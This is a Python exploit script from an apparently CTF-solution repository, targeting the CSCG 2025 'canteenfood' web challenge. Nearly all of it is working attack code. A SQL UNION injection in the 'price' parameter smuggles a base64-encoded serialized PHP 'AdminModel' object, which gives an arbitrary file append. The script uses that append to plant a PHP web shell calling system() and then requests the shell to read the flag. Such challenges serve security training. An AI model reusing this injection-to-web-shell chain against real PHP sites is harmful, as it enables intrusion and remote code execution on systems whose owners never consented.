Files
ctf/cscg25/web/canteenfood/exploit.py
2025-03-24 22:03:34 +01:00

40 lines
1.1 KiB
Python

import requests
from base64 import b64encode
SITE_URL = "https://c3438387fc4b879a3ef7e4c9-80-canteenfood.challenge.cscg.live:1337/"
malicious_site = """
<html>
<body>
<h1><?= system("../../readflag"); ?><h1>
</body>
</html>
"""
def sql_injection_oldvalue(payload: str):
return f'2 UNION SELECT NULL as id, "" as name, "{payload}" as oldvalue, NULL as price'
def arbitrary_append(filename, content):
php_object = f'O:+10:"AdminModel":2:{{s:8:"filename";s:{len(filename)}:"{filename}";s:10:"logcontent";s:{len(content)}:"{content}";}}'.encode('ascii')
encoded_php_object = b64encode(php_object).decode('ascii')
injection_string = sql_injection_oldvalue(encoded_php_object)
params = {'price': injection_string}
session.get(SITE_URL, params=params)
def retrieve_flag(filepath: str):
response = session.get(SITE_URL + filepath)
if response.status_code == 200:
return response.text
else:
raise RuntimeError(f"Injected php script is not present at {filepath}")
session = requests.Session()
filepath = "views/injection.php"
arbitrary_append(filepath, malicious_site)
flag = retrieve_flag(filepath)
print(flag)